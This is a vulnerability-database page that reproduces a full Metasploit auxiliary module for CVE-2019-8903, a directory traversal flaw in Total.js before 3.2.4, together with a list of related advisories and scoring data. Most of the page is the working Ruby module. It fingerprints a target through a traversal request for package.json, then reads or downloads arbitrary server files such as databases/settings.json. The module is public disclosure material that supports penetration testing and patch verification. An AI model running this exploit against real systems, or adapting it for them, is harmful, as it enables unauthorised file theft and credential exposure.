Vulners
Lucene search
Total.js prior to 3.2.4 Directory Traversal
🗓️ 10 Mar 2019 16:57:24Reported by Riccardo Krauter, Fabio CognoType 
metasploit🔗 www.rapid7.com👁 38 Views
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | Total.js requestcontinue Directory Traversal Vulnerability | 18 Feb 201900:00 | – | attackerkb |
| CVE-2019-8903 | 30 Oct 201900:00 | – | attackerkb |
 | CVE-2019-8903 | 12 Mar 201921:39 | – | circl |
 | Unspecified Vulnerability in Total.js Platform | 20 Feb 201900:00 | – | cnvd |
 | CVE-2019-8903 | 18 Feb 201916:00 | – | cve |
 | CVE-2019-8903 | 18 Feb 201916:00 | – | cvelist |
 | Path Traversal in total.js | 20 Feb 201915:40 | – | github |
 | Path Traversal | 28 Jun 201914:17 | – | nodejs |
 | Totaljs <3.2.3 - Local File Inclusion | 18 Jun 202603:02 | – | nuclei |
 | CVE-2019-8903 | 18 Feb 201916:29 | – | nvd |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Check and exploit Total.js Directory Traversal (CVE-2019-8903)
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Total.js prior to 3.2.4 Directory Traversal',
'Description' => %q(
This module check and exploits a directory traversal vulnerability in Total.js prior to 3.2.4.
Here is a list of accepted extensions: flac, jpg, jpeg, png, gif, ico, js, css, txt, xml,
woff, woff2, otf, ttf, eot, svg, zip, rar, pdf, docx, xlsx, doc, xls, html, htm, appcache,
manifest, map, ogv, ogg, mp4, mp3, webp, webm, swf, package, json, md, m4v, jsx, heif, heic
),
'Author' =>
[
'Riccardo Krauter', # Discovery
'Fabio Cogno' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-8903'],
['CWE', '22'],
['URL', 'https://blog.totaljs.com/blogs/news/20190213-a-critical-security-fix/'],
['URL', 'https://security.snyk.io/vuln/SNYK-JS-TOTALJS-173710']
],
'Privileged' => false,
'DisclosureDate' => '2019-02-18',
'Actions' =>
[
['CHECK', { 'Description' => 'Check if the target is vulnerable' }],
['READ', { 'Description' => 'Attempt to print file content' }],
['DOWNLOAD', { 'Description' => 'Attempt to download a file' }]
],
'DefaultAction' => 'CHECK'))
register_options(
[
OptString.new('TARGETURI', [true, 'Path to Total.js App installation', '/']),
OptInt.new('DEPTH', [true, 'Traversal depth', 1]),
OptString.new('FILE', [true, 'File to obtain', 'databases/settings.json'])
]
)
end
def check_ext
extensions = %w[
flac jpg jpeg png gif ico js css txt xml
woff woff2 otf ttf eot svg zip rar pdf
docx xlsx doc xls html htm appcache
manifest map ogv ogg mp4 mp3 webp webm
swf package json md m4v jsx heif heic
]
ext = datastore['FILE'].split('.').last
unless extensions.include? ext
print_warning "Extension #{ext} is not supported by the HTTP static route of the framework"
end
end
def check
uri = normalize_uri(target_uri.path) + '%2e%2e%2fpackage.json'
res = send_request_cgi(
'method' => 'GET',
'uri' => uri
)
if res && res.code == 200
json = res.get_json_document
if json.empty? || !json['dependencies']['total.js']
return Exploit::CheckCode::Safe
else
print_status("Total.js version is: #{json['dependencies']['total.js']}")
print_status("App name: #{json['name']}")
print_status("App description: #{json['description']}")
print_status("App version: #{json['version']}")
return Exploit::CheckCode::Vulnerable
end
elsif res && res.headers['X-Powered-By'].to_s.downcase.include?('total.js')
print_status('Target appear to be vulnerable!')
print_status("X-Powered-By: #{res.headers['X-Powered-By']}")
return Exploit::CheckCode::Detected
else
vprint_warning('No response')
return Exploit::CheckCode::Unknown
end
end
def read
check_ext
traverse = '%2e%2e%2f' * datastore['DEPTH']
uri = normalize_uri(target_uri.path) + traverse + datastore['FILE']
res = send_request_cgi(
'method' => 'GET',
'uri' => uri
)
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
if res.code != 200
print_error("Unable to read '#{datastore['FILE']}', possibly because:")
print_error("\t1. File does not exist.")
print_error("\t2. No permission.")
return
end
print_status("Getting #{datastore['FILE']}...")
print_line(res.body)
end
def download
check_ext
traverse = '%2e%2e%2f' * datastore['DEPTH']
uri = normalize_uri(target_uri.path) + traverse + datastore['FILE']
res = send_request_cgi(
'method' => 'GET',
'uri' => uri
)
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
if res.code != 200
print_error("Unable to read '#{datastore['FILE']}', possibly because:")
print_error("\t1. File does not exist.")
print_error("\t2. No permission.")
return
end
fname = datastore['FILE'].split('/')[-1].chop
ctype = res.headers['Content-Type'].split(';')
loot = store_loot('lfi.data', ctype[0], rhost, res.body, fname)
print_good("File #{fname} downloaded to: #{loot}")
end
def run
case action.name
when 'CHECK'
check
when 'READ'
read
when 'DOWNLOAD'
download
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Feb 2022 23:22Current
7.3High risk
Vulners AI Score7.3
CVSS 25
CVSS 37.5
EPSS0.72058